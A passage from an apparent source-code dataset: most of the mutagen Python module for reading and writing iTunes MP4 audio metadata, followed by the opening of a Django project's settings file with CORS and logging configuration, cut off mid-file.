free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as\n# published by the Free Software Foundation.\n\n\"\"\"Read and write MPEG-4 audio files with iTunes metadata.\n\nThis module will read MPEG-4 audio information and metadata,\nas found in Apple's MP4 (aka M4A, M4B, M4P) files.\n\nThere is no official specification for this format. The source code\nfor TagLib, FAAD, and various MPEG specifications at\n\n* http://developer.apple.com/documentation/QuickTime/QTFF/\n* http://www.geocities.com/xhelmboyx/quicktime/formats/mp4-layout.txt\n* http://standards.iso.org/ittf/PubliclyAvailableStandards/\\\nc041828_ISO_IEC_14496-12_2005(E).zip\n* http://wiki.multimedia.cx/index.php?title=Apple_QuickTime\n\nwere all consulted.\n\"\"\"\n\nimport struct\nimport sys\n\nfrom mutagen import FileType, Metadata, StreamInfo\nfrom mutagen._constants import GENRES\nfrom mutagen._util import (cdata, insert_bytes, DictProxy, MutagenError,\n hashable, enum)\nfrom mutagen._compat import (reraise, PY2, string_types, text_type, chr_,\n iteritems, PY3, cBytesIO)\nfrom ._atom import Atoms, Atom, AtomError\nfrom ._util import parse_full_atom\nfrom ._as_entry import AudioSampleEntry, ASEntryError\n\n\nclass error(IOError, MutagenError):\n pass\n\n\nclass MP4MetadataError(error):\n pass\n\n\nclass MP4StreamInfoError(error):\n pass\n\n\nclass MP4MetadataValueError(ValueError, MP4MetadataError):\n pass\n\n__all__ = ['MP4', 'Open', 'delete', 'MP4Cover', 'MP4FreeForm', 'AtomDataType','MediaKind', 'HDVideo', 'ContentRating']\n\n\n@enum\nclass AtomDataType(object):\n \"\"\"Enum for `dataformat` attribute of MP4FreeForm.\n\n .. versionadded:: 1.25\n \"\"\"\n\n IMPLICIT = 0\n \"\"\"for use with tags for which no type needs to be indicated because\n only one type is allowed\"\"\"\n\n UTF8 = 1\n \"\"\"without any count or null terminator\"\"\"\n\n UTF16 = 2\n \"\"\"also known as UTF-16BE\"\"\"\n\n SJIS = 3\n \"\"\"deprecated unless it is needed for special Japanese characters\"\"\"\n\n HTML = 6\n \"\"\"the HTML file header specifies which HTML version\"\"\"\n\n XML = 7\n \"\"\"the XML header must identify the DTD or schemas\"\"\"\n\n UUID = 8\n \"\"\"also known as GUID; stored as 16 bytes in binary (valid as an ID)\"\"\"\n\n ISRC = 9\n \"\"\"stored as UTF-8 text (valid as an ID)\"\"\"\n\n MI3P = 10\n \"\"\"stored as UTF-8 text (valid as an ID)\"\"\"\n\n GIF = 12\n \"\"\"(deprecated) a GIF image\"\"\"\n\n JPEG = 13\n \"\"\"a JPEG image\"\"\"\n\n PNG = 14\n \"\"\"PNG image\"\"\"\n\n URL = 15\n \"\"\"absolute, in UTF-8 characters\"\"\"\n\n DURATION = 16\n \"\"\"in milliseconds, 32-bit integer\"\"\"\n\n DATETIME = 17\n \"\"\"in UTC, counting seconds since midnight, January 1, 1904;\n 32 or 64-bits\"\"\"\n\n GENRES = 18\n \"\"\"a list of enumerated values\"\"\"\n\n INTEGER = 21\n \"\"\"a signed big-endian integer with length one of { 1,2,3,4,8 } bytes\"\"\"\n\n RIAA_PA = 24\n \"\"\"RIAA parental advisory; { -1=no, 1=yes, 0=unspecified },\n 8-bit ingteger\"\"\"\n\n UPC = 25\n \"\"\"Universal Product Code, in text UTF-8 format (valid as an ID)\"\"\"\n\n BMP = 27\n \"\"\"Windows bitmap image\"\"\"\n\n\n@hashable\nclass MP4Cover(bytes):\n \"\"\"A cover artwork.\n\n Attributes:\n\n * imageformat -- format of the image (either FORMAT_JPEG or FORMAT_PNG)\n \"\"\"\n\n FORMAT_JPEG = AtomDataType.JPEG\n FORMAT_PNG = AtomDataType.PNG\n\n def __new__(cls, data, *args, **kwargs):\n return bytes.__new__(cls, data)\n\n def __init__(self, data, imageformat=FORMAT_JPEG):\n self.imageformat = imageformat\n\n __hash__ = bytes.__hash__\n\n def __eq__(self, other):\n if not isinstance(other, MP4Cover):\n return NotImplemented\n\n if not bytes.__eq__(self, other):\n return False\n\n if self.imageformat != other.imageformat:\n return False\n\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n return \"%s(%r, %r)\" % (\n type(self).__name__, bytes(self),\n AtomDataType(self.imageformat))\n\n\n@hashable\nclass MP4FreeForm(bytes):\n \"\"\"A freeform value.\n\n Attributes:\n\n * dataformat -- format of the data (see AtomDataType)\n \"\"\"\n\n FORMAT_DATA = AtomDataType.IMPLICIT # deprecated\n FORMAT_TEXT = AtomDataType.UTF8 # deprecated\n\n def __new__(cls, data, *args, **kwargs):\n return bytes.__new__(cls, data)\n\n def __init__(self, data, dataformat=AtomDataType.UTF8, version=0):\n self.dataformat = dataformat\n self.version = version\n\n __hash__ = bytes.__hash__\n\n def __eq__(self, other):\n if not isinstance(other, MP4FreeForm):\n return NotImplemented\n\n if not bytes.__eq__(self, other):\n return False\n\n if self.dataformat != other.dataformat:\n return False\n\n if self.version != other.version:\n return False\n\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n return \"%s(%r, %r)\" % (\n type(self).__name__, bytes(self),\n AtomDataType(self.dataformat))\n\n\n\ndef _name2key(name):\n if PY2:\n return name\n return name.decode(\"latin-1\")\n\n\ndef _key2name(key):\n if PY2:\n return key\n return key.encode(\"latin-1\")\n\n\nclass MP4Tags(DictProxy, Metadata):\n r\"\"\"Dictionary containing Apple iTunes metadata list key/values.\n\n Keys are four byte identifiers, except for freeform ('----')\n keys. Values are usually unicode strings, but some atoms have a\n special structure:\n\n Text values (multiple values per key are supported):\n\n * '\\\\xa9nam' -- track title\n * '\\\\xa9alb' -- album\n * '\\\\xa9ART' -- artist\n * 'aART' -- album artist\n * '\\\\xa9wrt' -- composer\n * '\\\\xa9day' -- year\n * '\\\\xa9cmt' -- comment\n * 'desc' -- description (usually used in podcasts)\n * 'purd' -- purchase date\n * '\\\\xa9grp' -- grouping\n * '\\\\xa9gen' -- genre\n * '\\\\xa9lyr' -- lyrics\n * 'purl' -- podcast URL\n * 'egid' -- podcast episode GUID\n * 'catg' -- podcast category\n * 'keyw' -- podcast keywords\n * '\\\\xa9too' -- encoded by\n * 'cprt' -- copyright\n * 'soal' -- album sort order\n * 'soaa' -- album artist sort order\n * 'soar' -- artist sort order\n * 'sonm' -- title sort order\n * 'soco' -- composer sort order\n * 'sosn' -- show sort order\n * 'tvsh' -- show name\n\n Boolean values:\n\n * 'cpil' -- part of a compilation\n * 'pgap' -- part of a gapless album\n * 'pcst' -- podcast (iTunes reads this only on import)\n\n Tuples of ints (multiple values per key are supported):\n\n * 'trkn' -- track number, total tracks\n * 'disk' -- disc number, total discs\n\n Others:\n\n * 'tmpo' -- tempo/BPM, 16 bit int\n * 'covr' -- cover artwork, list of MP4Cover objects (which are\n tagged strs)\n * 'gnre' -- ID3v1 genre. Not supported, use '\\\\xa9gen' instead.\n\n The freeform '----' frames use a key in the format '----:mean:name'\n where 'mean' is usually 'com.apple.iTunes' and 'name' is a unique\n identifier for this frame. The value is a str, but is probably\n text that can be decoded as UTF-8. Multiple values per key are\n supported.\n\n MP4 tag data cannot exist outside of the structure of an MP4 file,\n so this class should not be manually instantiated.\n\n Unknown non-text tags and tags that failed to parse will be written\n back as is.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self._failed_atoms = {}\n super(MP4Tags, self).__init__(*args, **kwargs)\n\n def load(self, atoms, fileobj):\n try:\n ilst = atoms[b\"moov.udta.meta.ilst\"]\n except KeyError as key:\n raise MP4MetadataError(key)\n for atom in ilst.children:\n ok, data = atom.read(fileobj)\n if not ok:\n raise MP4MetadataError(\"Not enough data\")\n\n try:\n if atom.name in self.__atoms:\n info = self.__atoms[atom.name]\n info[0](self, atom, data)\n else:\n # unknown atom, try as text\n self.__parse_text(atom, data, implicit=False)\n except MP4MetadataError:\n # parsing failed, save them so we can write them back\n key = _name2key(atom.name)\n self._failed_atoms.setdefault(key, []).append(data)\n\n def __setitem__(self, key, value):\n if not isinstance(key, str):\n raise TypeError(\"key has to be str\")\n super(MP4Tags, self).__setitem__(key, value)\n\n @classmethod\n def _can_load(cls, atoms):\n return b\"moov.udta.meta.ilst\" in atoms\n\n @staticmethod\n def _key_sort(item):\n (key, v) = item\n # iTunes always writes the tags in order of \"relevance\", try\n # to copy it as closely as possible.\n order = [\"\\xa9nam\", \"\\xa9ART\", \"\\xa9wrt\", \"\\xa9alb\",\n \"\\xa9gen\", \"gnre\", \"trkn\", \"disk\",\n \"\\xa9day\", \"cpil\", \"pgap\", \"pcst\", \"tmpo\",\n \"\\xa9too\", \"----\", \"covr\", \"\\xa9lyr\", \"stik\",\n \"tvsh\", \"tven\", \"tvsn\", \"tves\", \"tvnn\"]\n order = dict(zip(order, range(len(order))))\n last = len(order)\n # If there's no key-based way to distinguish, order by length.\n # If there's still no way, go by string comparison on the\n # values, so we at least have something determinstic.\n return (order.get(key[:4], last), len(repr(v)), repr(v))\n\n def save(self, filename):\n \"\"\"Save the metadata to the given filename.\"\"\"\n\n values = []\n items = sorted(self.items(), key=self._key_sort)\n for key, value in items:\n atom_name = _key2name(key)[:4]\n if atom_name in self.__atoms:\n render_func = self.__atoms[atom_name][1]\n else:\n render_func = type(self).__render_text\n\n try:\n if value:\n values.append(render_func(self, key, value))\n except (TypeError, ValueError) as s:\n reraise(MP4MetadataValueError, s, sys.exc_info()[2])\n\n for key, failed in iteritems(self._failed_atoms):\n # don't write atoms back if we have added a new one with\n # the same name, this excludes freeform which can have\n # multiple atoms with the same key (most parsers seem to be able\n # to handle that)\n if key in self:\n assert _key2name(key) != b\"----\"\n continue\n for data in failed:\n values.append(Atom.render(_key2name(key), data))\n\n data = Atom.render(b\"ilst\", b\"\".join(values))\n\n # Find the old atoms.\n with open(filename, \"rb+\") as fileobj:\n try:\n atoms = Atoms(fileobj)\n except AtomError as err:\n reraise(error, err, sys.exc_info()[2])\n\n try:\n path = atoms.path(b\"moov\", b\"udta\", b\"meta\", b\"ilst\")\n except KeyError:\n self.__save_new(fileobj, atoms, data)\n else:\n self.__save_existing(fileobj, atoms, path, data)\n\n def __pad_ilst(self, data, length=None):\n if length is None:\n length = ((len(data) + 1023) & ~1023) - len(data)\n return Atom.render(b\"free\", b\"\\x00\" * length)\n\n def __save_new(self, fileobj, atoms, ilst):\n hdlr = Atom.render(b\"hdlr\", b\"\\x00\" * 8 + b\"mdirappl\" + b\"\\x00\" * 9)\n meta = Atom.render(\n b\"meta\", b\"\\x00\\x00\\x00\\x00\" + hdlr + ilst + self.__pad_ilst(ilst))\n try:\n path = atoms.path(b\"moov\", b\"udta\")\n except KeyError:\n # moov.udta not found -- create one\n path = atoms.path(b\"moov\")\n meta = Atom.render(b\"udta\", meta)\n offset = path[-1].offset + 8\n insert_bytes(fileobj, len(meta), offset)\n fileobj.seek(offset)\n fileobj.write(meta)\n self.__update_parents(fileobj, path, len(meta))\n self.__update_offsets(fileobj, atoms, len(meta), offset)\n\n def __save_existing(self, fileobj, atoms, path, data):\n # Replace the old ilst atom.\n ilst = path.pop()\n offset = ilst.offset\n length = ilst.length\n\n # Check for padding \"free\" atoms\n meta = path[-1]\n index = meta.children.index(ilst)\n try:\n prev = meta.children[index - 1]\n if prev.name == b\"free\":\n offset = prev.offset\n length += prev.length\n except IndexError:\n pass\n try:\n next = meta.children[index + 1]\n if next.name == b\"free\":\n length += next.length\n except IndexError:\n pass\n\n delta = len(data) - length\n if delta > 0 or (delta < 0 and delta > -8):\n data += self.__pad_ilst(data)\n delta = len(data) - length\n insert_bytes(fileobj, delta, offset)\n elif delta < 0:\n data += self.__pad_ilst(data, -delta - 8)\n delta = 0\n\n fileobj.seek(offset)\n fileobj.write(data)\n self.__update_parents(fileobj, path, delta)\n self.__update_offsets(fileobj, atoms, delta, offset)\n\n def __update_parents(self, fileobj, path, delta):\n \"\"\"Update all parent atoms with the new size.\"\"\"\n for atom in path:\n fileobj.seek(atom.offset)\n size = cdata.uint_be(fileobj.read(4))\n if size == 1: # 64bit\n # skip name (4B) and read size (8B)\n size = cdata.ulonglong_be(fileobj.read(12)[4:])\n fileobj.seek(atom.offset + 8)\n fileobj.write(cdata.to_ulonglong_be(size + delta))\n else: # 32bit\n fileobj.seek(atom.offset)\n fileobj.write(cdata.to_uint_be(size + delta))\n\n def __update_offset_table(self, fileobj, fmt, atom, delta, offset):\n \"\"\"Update offset table in the specified atom.\"\"\"\n if atom.offset > offset:\n atom.offset += delta\n fileobj.seek(atom.offset + 12)\n data = fileobj.read(atom.length - 12)\n fmt = fmt % cdata.uint_be(data[:4])\n offsets = struct.unpack(fmt, data[4:])\n offsets = [o + (0, delta)[offset < o] for o in offsets]\n fileobj.seek(atom.offset + 16)\n fileobj.write(struct.pack(fmt, *offsets))\n\n def __update_tfhd(self, fileobj, atom, delta, offset):\n if atom.offset > offset:\n atom.offset += delta\n fileobj.seek(atom.offset + 9)\n data = fileobj.read(atom.length - 9)\n flags = cdata.uint_be(b\"\\x00\" + data[:3])\n if flags & 1:\n o = cdata.ulonglong_be(data[7:15])\n if o > offset:\n o += delta\n fileobj.seek(atom.offset + 16)\n fileobj.write(cdata.to_ulonglong_be(o))\n\n def __update_offsets(self, fileobj, atoms, delta, offset):\n \"\"\"Update offset tables in all 'stco' and 'co64' atoms.\"\"\"\n if delta == 0:\n return\n moov = atoms[b\"moov\"]\n for atom in moov.findall(b'stco', True):\n self.__update_offset_table(fileobj, \">%dI\", atom, delta, offset)\n for atom in moov.findall(b'co64', True):\n self.__update_offset_table(fileobj, \">%dQ\", atom, delta, offset)\n try:\n for atom in atoms[b\"moof\"].findall(b'tfhd', True):\n self.__update_tfhd(fileobj, atom, delta, offset)\n except KeyError:\n pass\n\n def __parse_data(self, atom, data):\n pos = 0\n while pos < atom.length - 8:\n head = data[pos:pos + 12]\n if len(head) != 12:\n raise MP4MetadataError(\"truncated atom % r\" % atom.name)\n length, name = struct.unpack(\">I4s\", head[:8])\n version = ord(head[8:9])\n flags = struct.unpack(\">I\", b\"\\x00\" + head[9:12])[0]\n if name != b\"data\":\n raise MP4MetadataError(\n \"unexpected atom %r inside %r\" % (name, atom.name))\n\n chunk = data[pos + 16:pos + length]\n if len(chunk) != length - 16:\n raise MP4MetadataError(\"truncated atom % r\" % atom.name)\n yield version, flags, chunk\n pos += length\n\n def __add(self, key, value, single=False):\n assert isinstance(key, str)\n\n if single:\n self[key] = value\n else:\n self.setdefault(key, []).extend(value)\n\n def __render_data(self, key, version, flags, value):\n return Atom.render(_key2name(key), b\"\".join([\n Atom.render(\n b\"data\", struct.pack(\">2I\", version << 24 | flags, 0) + data)\n for data in value]))\n\n def __parse_freeform(self, atom, data):\n length = cdata.uint_be(data[:4])\n mean = data[12:length]\n pos = length\n length = cdata.uint_be(data[pos:pos + 4])\n name = data[pos + 12:pos + length]\n pos += length\n value = []\n while pos < atom.length - 8:\n length, atom_name = struct.unpack(\">I4s\", data[pos:pos + 8])\n if atom_name != b\"data\":\n raise MP4MetadataError(\n \"unexpected atom %r inside %r\" % (atom_name, atom.name))\n\n version = ord(data[pos + 8:pos + 8 + 1])\n flags = struct.unpack(\">I\", b\"\\x00\" + data[pos + 9:pos + 12])[0]\n value.append(MP4FreeForm(data[pos + 16:pos + length],\n dataformat=flags, version=version))\n pos += length\n\n key = _name2key(atom.name + b\":\" + mean + b\":\" + name)\n self.__add(key, value)\n\n def __render_freeform(self, key, value):\n if isinstance(value, bytes):\n value = [value]\n\n dummy, mean, name = _key2name(key).split(b\":\", 2)\n mean = struct.pack(\">I4sI\", len(mean) + 12, b\"mean\", 0) + mean\n name = struct.pack(\">I4sI\", len(name) + 12, b\"name\", 0) + name\n\n data = b\"\"\n for v in value:\n flags = AtomDataType.UTF8\n version = 0\n if isinstance(v, MP4FreeForm):\n flags = v.dataformat\n version = v.version\n\n data += struct.pack(\n \">I4s2I\", len(v) + 16, b\"data\", version << 24 | flags, 0)\n data += v.encode('UTF-8')\n\n return Atom.render(b\"----\", mean + name + data)\n\n def __parse_pair(self, atom, data):\n key = _name2key(atom.name)\n values = [struct.unpack(\">2H\", d[2:6]) for\n version, flags, d in self.__parse_data(atom, data)]\n self.__add(key, values)\n\n def __render_pair(self, key, value):\n data = []\n for (track, total) in value:\n if 0 <= track < 1 << 16 and 0 <= total < 1 << 16:\n data.append(struct.pack(\">4H\", 0, track, total, 0))\n else:\n raise MP4MetadataValueError(\n \"invalid numeric pair %r\" % ((track, total),))\n return self.__render_data(key, 0, AtomDataType.IMPLICIT, data)\n\n def __render_pair_no_trailing(self, key, value):\n data = []\n for (track, total) in value:\n if 0 <= track < 1 << 16 and 0 <= total < 1 << 16:\n data.append(struct.pack(\">3H\", 0, track, total))\n else:\n raise MP4MetadataValueError(\n \"invalid numeric pair %r\" % ((track, total),))\n return self.__render_data(key, 0, AtomDataType.IMPLICIT, data)\n\n def __parse_genre(self, atom, data):\n values = []\n for version, flags, data in self.__parse_data(atom, data):\n # version = 0, flags = 0\n if len(data) != 2:\n raise MP4MetadataValueError(\"invalid genre\")\n genre = cdata.short_be(data)\n # Translate to a freeform genre.\n try:\n genre = GENRES[genre - 1]\n except IndexError:\n # this will make us write it back at least\n raise MP4MetadataValueError(\"unknown genre\")\n values.append(genre)\n key = _name2key(b\"\\xa9gen\")\n self.__add(key, values)\n\n def __parse_tempo(self, atom, data):\n values = []\n for version, flags, data in self.__parse_data(atom, data):\n # version = 0, flags = 0 or 21\n if len(data) != 2:\n raise MP4MetadataValueError(\"invalid tempo\")\n values.append(cdata.ushort_be(data))\n key = _name2key(atom.name)\n self.__add(key, values)\n\n def __render_tempo(self, key, value):\n try:\n if len(value) == 0:\n return self.__render_data(key, 0, AtomDataType.INTEGER, b\"\")\n\n if (min(value) < 0) or (max(value) >= 2 ** 16):\n raise MP4MetadataValueError(\n \"invalid 16 bit integers: %r\" % value)\n except TypeError:\n raise MP4MetadataValueError(\n \"tmpo must be a list of 16 bit integers\")\n\n values = [cdata.to_ushort_be(v) for v in value]\n return self.__render_data(key, 0, AtomDataType.INTEGER, values)\n\n def __parse_bool(self, atom, data):\n for version, flags, data in self.__parse_data(atom, data):\n if len(data) != 1:\n raise MP4MetadataValueError(\"invalid bool\")\n\n value = bool(ord(data))\n key = _name2key(atom.name)\n self.__add(key, value, single=True)\n\n def __render_bool(self, key, value):\n return self.__render_data(\n key, 0, AtomDataType.INTEGER, [chr_(bool(value))])\n\n def __parse_cover(self, atom, data):\n values = []\n pos = 0\n while pos < atom.length - 8:\n length, name, imageformat = struct.unpack(\">I4sI\",\n data[pos:pos + 12])\n if name != b\"data\":\n if name == b\"name\":\n pos += length\n continue\n raise MP4MetadataError(\n \"unexpected atom %r inside 'covr'\" % name)\n if imageformat not in (MP4Cover.FORMAT_JPEG, MP4Cover.FORMAT_PNG):\n # Sometimes AtomDataType.IMPLICIT or simply wrong.\n # In all cases it was jpeg, so default to it\n imageformat = MP4Cover.FORMAT_JPEG\n cover = MP4Cover(data[pos + 16:pos + length], imageformat)\n values.append(cover)\n pos += length\n\n key = _name2key(atom.name)\n self.__add(key, values)\n\n def __render_cover(self, key, value):\n atom_data = []\n for cover in value:\n try:\n imageformat = cover.imageformat\n except AttributeError:\n imageformat = MP4Cover.FORMAT_JPEG\n atom_data.append(Atom.render(\n b\"data\", struct.pack(\">2I\", imageformat, 0) + cover))\n return Atom.render(_key2name(key), b\"\".join(atom_data))\n\n def __parse_text(self, atom, data, implicit=True):\n # implicit = False, for parsing unknown atoms only take utf8 ones.\n # For known ones we can assume the implicit are utf8 too.\n values = []\n for version, flags, atom_data in self.__parse_data(atom, data):\n if implicit:\n if flags not in (AtomDataType.IMPLICIT, AtomDataType.UTF8):\n raise MP4MetadataError(\n \"Unknown atom type %r for %r\" % (flags, atom.name))\n else:\n if flags != AtomDataType.UTF8:\n raise MP4MetadataError(\n \"%r is not text, ignore\" % atom.name)\n\n try:\n text = atom_data.decode(\"utf-8\")\n except UnicodeDecodeError as e:\n raise MP4MetadataError(\"%s: %s\" % (_name2key(atom.name), e))\n\n values.append(text)\n\n key = _name2key(atom.name)\n self.__add(key, values)\n\n def __render_text(self, key, value, flags=AtomDataType.UTF8):\n if isinstance(value, string_types):\n value = [value]\n encoded = []\n for v in value:\n if not isinstance(v, text_type):\n if PY3:\n raise TypeError(\"%r not str\" % v)\n v = v.decode(\"utf-8\")\n encoded.append(v.encode(\"utf-8\"))\n\n return self.__render_data(key, 0, flags, encoded)\n\n def __render_8int(self, key, value):\n try:\n if len(value) == 0:\n return self.__render_data(key, 0x07, b\"\")\n\n if min(value) < 0 or max(value) >= 2 ** 8:\n raise MP4MetadataValueError(\n \"invalid 8 bit integers: %r\" % value)\n except TypeError:\n raise MP4MetadataValueError(\n \"%s must be a list of 8 bit integers\" % (key))\n\n values = list(map(cdata.to_uchar_be, value))\n return self.__render_data(key, 0, 0x07, values)\n\n def __render_32int(self, key, value):\n try:\n if len(value) == 0:\n return self.__render_data(key, 0x31, b\"\")\n\n if min(value) < 0 or max(value) >= 2 ** 32:\n raise MP4MetadataValueError(\n \"invalid 32 bit integers: %r\" % value)\n except TypeError:\n raise MP4MetadataValueError(\n \"%s must be a list of 32 bit integers\" % (key))\n\n values = list(map(cdata.to_uint_be, value))\n return self.__render_data(key, 0, 0x31, values)\n\n def delete(self, filename):\n \"\"\"Remove the metadata from the given filename.\"\"\"\n\n self._failed_atoms.clear()\n self.clear()\n self.save(filename)\n\n __atoms = {\n b\"----\": (__parse_freeform, __render_freeform),\n b\"trkn\": (__parse_pair, __render_pair),\n b\"disk\": (__parse_pair, __render_pair_no_trailing),\n b\"gnre\": (__parse_genre, None),\n b\"tmpo\": (__parse_tempo, __render_tempo),\n b\"cpil\": (__parse_bool, __render_bool),\n b\"pgap\": (__parse_bool, __render_bool),\n b\"pcst\": (__parse_bool, __render_bool),\n b\"covr\": (__parse_cover, __render_cover),\n b\"purl\": (__parse_text, __render_text),\n b\"egid\": (__parse_text, __render_text),\n b\"hdvd\": (__parse_text, __render_8int),\n b\"tves\": (__parse_text, __render_32int),\n b\"tvsn\": (__parse_text, __render_32int),\n b\"stik\": (__parse_text, __render_8int),\n b\"rtng\": (__parse_text, __render_8int),\n }\n\n # these allow implicit flags and parse as text\n for name in [b\"\\xa9nam\", b\"\\xa9alb\", b\"\\xa9ART\", b\"aART\", b\"\\xa9wrt\",\n b\"\\xa9day\", b\"\\xa9cmt\", b\"desc\", b\"purd\", b\"\\xa9grp\",\n b\"\\xa9gen\", b\"\\xa9lyr\", b\"catg\", b\"keyw\", b\"\\xa9too\",\n b\"cprt\", b\"soal\", b\"soaa\", b\"soar\", b\"sonm\", b\"soco\",\n b\"sosn\", b\"tvsh\", b\"tven\", b\"tvnn\"]:\n __atoms[name] = (__parse_text, __render_text)\n\n def pprint(self):\n values = []\n for key, value in iteritems(self):\n if not isinstance(key, text_type):\n key = key.decode(\"latin-1\")\n if key == \"covr\":\n values.append(\"%s=%s\" % (key, \", \".join(\n [\"[%d bytes of data]\" % len(data) for data in value])))\n elif isinstance(value, list):\n for v in value:\n values.append(\"%s=%r\" % (key, v))\n else:\n values.append(\"%s=%r\" % (key, value))\n return \"\\n\".join(values)\n\n\nclass MP4Info(StreamInfo):\n \"\"\"MPEG-4 stream information.\n\n Attributes:\n\n * bitrate -- bitrate in bits per second, as an int\n * length -- file length in seconds, as a float\n * channels -- number of audio channels\n * sample_rate -- audio sampling rate in Hz\n * bits_per_sample -- bits per sample\n * codec (string):\n * if starting with ``\"mp4a\"`` uses an mp4a audio codec\n (see the codec parameter in rfc6381 for details e.g. ``\"mp4a.40.2\"``)\n * for everything else see a list of possible values at\n http://www.mp4ra.org/codecs.html\n\n e.g. ``\"mp4a\"``, ``\"alac\"``, ``\"mp4a.40.2\"``, ``\"ac-3\"`` etc.\n * codec_description (string):\n Name of the codec used (ALAC, AAC LC, AC-3...). Values might change in\n the future, use for display purposes only.\n \"\"\"\n\n bitrate = 0\n channels = 0\n sample_rate = 0\n bits_per_sample = 0\n codec = u\"\"\n codec_name = u\"\"\n\n def __init__(self, atoms, fileobj):\n try:\n moov = atoms[b\"moov\"]\n except KeyError:\n raise MP4StreamInfoError(\"not a MP4 file\")\n\n for trak in moov.findall(b\"trak\"):\n hdlr = trak[b\"mdia\", b\"hdlr\"]\n ok, data = hdlr.read(fileobj)\n if not ok:\n raise MP4StreamInfoError(\"Not enough data\")\n if data[8:12] == b\"soun\":\n break\n else:\n raise MP4StreamInfoError(\"track has no audio data\")\n\n mdhd = trak[b\"mdia\", b\"mdhd\"]\n ok, data = mdhd.read(fileobj)\n if not ok:\n raise MP4StreamInfoError(\"Not enough data\")\n\n try:\n version, flags, data = parse_full_atom(data)\n except ValueError as e:\n raise MP4StreamInfoError(e)\n\n if version == 0:\n offset = 8\n fmt = \">2I\"\n elif version == 1:\n offset = 16\n fmt = \">IQ\"\n else:\n raise MP4StreamInfoError(\"Unknown mdhd version %d\" % version)\n\n end = offset + struct.calcsize(fmt)\n unit, length = struct.unpack(fmt, data[offset:end])\n try:\n self.length = float(length) / unit\n except ZeroDivisionError:\n self.length = 0\n\n try:\n atom = trak[b\"mdia\", b\"minf\", b\"stbl\", b\"stsd\"]\n except KeyError:\n pass\n else:\n self._parse_stsd(atom, fileobj)\n\n def _parse_stsd(self, atom, fileobj):\n \"\"\"Sets channels, bits_per_sample, sample_rate and optionally bitrate.\n\n Can raise MP4StreamInfoError.\n \"\"\"\n\n assert atom.name == b\"stsd\"\n\n ok, data = atom.read(fileobj)\n if not ok:\n raise MP4StreamInfoError(\"Invalid stsd\")\n\n try:\n version, flags, data = parse_full_atom(data)\n except ValueError as e:\n raise MP4StreamInfoError(e)\n\n if version != 0:\n raise MP4StreamInfoError(\"Unsupported stsd version\")\n\n try:\n num_entries, offset = cdata.uint32_be_from(data, 0)\n except cdata.error as e:\n raise MP4StreamInfoError(e)\n\n if num_entries == 0:\n return\n\n # look at the first entry if there is one\n entry_fileobj = cBytesIO(data[offset:])\n try:\n entry_atom = Atom(entry_fileobj)\n except AtomError as e:\n raise MP4StreamInfoError(e)\n\n try:\n entry = AudioSampleEntry(entry_atom, entry_fileobj)\n except ASEntryError as e:\n raise MP4StreamInfoError(e)\n else:\n self.channels = entry.channels\n self.bits_per_sample = entry.sample_size\n self.sample_rate = entry.sample_rate\n self.bitrate = entry.bitrate\n self.codec = entry.codec\n self.codec_description = entry.codec_description\n\n def pprint(self):\n return \"MPEG-4 audio (%s), %.2f seconds, %d bps\" % (\n self.codec_description, self.length, self.bitrate)\n\n\nclass MP4(FileType):\n \"\"\"An MPEG-4 audio file, probably containing AAC.\n\n If more than one track is present in the file, the first is used.\n Only audio ('soun') tracks will be read.\n\n :ivar info: :class:`MP4Info`\n :ivar tags: :class:`MP4Tags`\n \"\"\"\n\n MP4Tags = MP4Tags\n\n _mimes = [\"audio/mp4\", \"audio/x-m4a\", \"audio/mpeg4\", \"audio/aac\"]\n\n def load(self, filename):\n self.filename = filename\n with open(filename, \"rb\") as fileobj:\n try:\n atoms = Atoms(fileobj)\n except AtomError as err:\n reraise(error, err, sys.exc_info()[2])\n\n try:\n self.info = MP4Info(atoms, fileobj)\n except error:\n raise\n except Exception as err:\n reraise(MP4StreamInfoError, err, sys.exc_info()[2])\n\n if not MP4Tags._can_load(atoms):\n self.tags = None\n else:\n try:\n self.tags = self.MP4Tags(atoms, fileobj)\n except error:\n raise\n except Exception as err:\n reraise(MP4MetadataError, err, sys.exc_info()[2])\n\n def add_tags(self):\n if self.tags is None:\n self.tags = self.MP4Tags()\n else:\n raise error(\"an MP4 tag already exists\")\n\n @staticmethod\n def score(filename, fileobj, header_data):\n return (b\"ftyp\" in header_data) + (b\"mp4\" in header_data)\n\n\nOpen = MP4\n\n\ndef delete(filename):\n \"\"\"Remove tags from a file.\"\"\"\n\n MP4(filename).delete()\n\nclass MediaKind:\n MUSIC = [1]\n AUDIO_BOOK = [2]\n MUSIC_VIDEO = [6]\n MOVIE = [9]\n TV_SHOW = [10]\n BOOKLET = [11]\n RINGTONE = [14]\n\nclass HDVideo:\n STANDARD = [0]\n P720 = [1]\n P1080 = [2]\n\nclass ContentRating:\n NONE = [0]\n CLEAN = [2]\n EXPLICIT = [4]\n"} {"ext": "py", "sha": "1a30383081f520f321035a843ac38a723ccdbdd5", "content": "\"\"\"\nDjango settings for lofiback project.\n\nGenerated by 'django-admin startproject' using Django 2.0.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.0/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/2.0/ref/settings/\n\"\"\"\n\nimport os\n\n#Права на загруженные файлы\nFILE_UPLOAD_PERMISSIONS = 0o644\n\nCORS_ORIGIN_WHITELIST = (\n 'localhost:3000',\n '127.0.0.1:3000',\n '.lofichan.ru',\n 'api.lofichan.ru',\n 'lofichan.ru',\n)\n\nCORS_ALLOW_METHODS = (\n 'DELETE',\n 'GET',\n 'OPTIONS',\n 'PATCH',\n 'POST',\n 'PUT',\n)\n\nCORS_ALLOW_CREDENTIALS = True\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': 'error.log',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['file'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['file'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n },\n}\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/\n\n# SECURITY 